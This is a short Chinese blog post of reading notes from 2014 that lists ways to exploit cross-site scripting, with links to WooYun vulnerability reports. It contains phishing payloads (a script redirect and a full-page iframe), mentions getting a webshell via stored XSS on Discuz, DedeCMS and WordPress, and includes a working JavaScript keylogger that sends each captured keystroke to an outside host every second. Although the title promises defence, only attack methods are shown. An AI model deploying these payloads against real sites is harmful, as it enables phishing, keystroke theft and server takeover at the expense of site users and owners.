xss跨站脚本攻击与防御读书笔记(原创)

XSS在客户端执行 可以任意执行js代码

   0x01  xss 的利用方式

1. 钓鱼      案例:http://www.wooyun.org/bugs/wooyun-2014-076685  我是如何通过一个 XSS 探测搜狐内网扫描内网并且蠕动到前台的

2.钓鱼,伪造操作界面钓鱼

 直接跳转
<script>document.location.href="http://test.com/xxx.htm"

 iframe钓鱼

<iframe src="http://test.com/11.htm" heigt="100%" width="100%">

flash钓鱼

http://www.wooyun.org/bugs/wooyun-2010-02532   

 

3.弹广告刷流量

4.任意POST/GET操作

   如在dz中 后台的储存型XSS可以get uckey,或者get webshell 案例 

http://www.wooyun.org/bugs/wooyun-2010-045716

 在dedecms中 一个储存XSS配合后台文件管理器 getshell

 案例: dedecms利用xss+csrf getshell

http://huakai.paxmac.org/?p=587

wordpess中储存XSS配合模板getshell

 5.html5 中还可以截图

6.窃取cookies

XSS盲打类的

7.XSS键盘记录

var keys='';document.onkeypress = function(e) 
{ get = window.event?event:e;
key = get.keyCode?get.keyCode:get.charCode;
key = String.fromCharCode(key);
keys+=key;}window.setInterval(function()
{
new Image().src = 'http://yourhost.com/g.php?c='+keys; keys = '';}, 1000);

  

 8.客户端信息的刺探

  扫描内网
自动提交st2漏洞(案列在黑哥的PPT里面)
ip地址

9.xssworm
10.ddos

posted @ 2014-12-16 12:05  anything good  阅读(319)  评论(0编辑  收藏  举报
孤 's 博客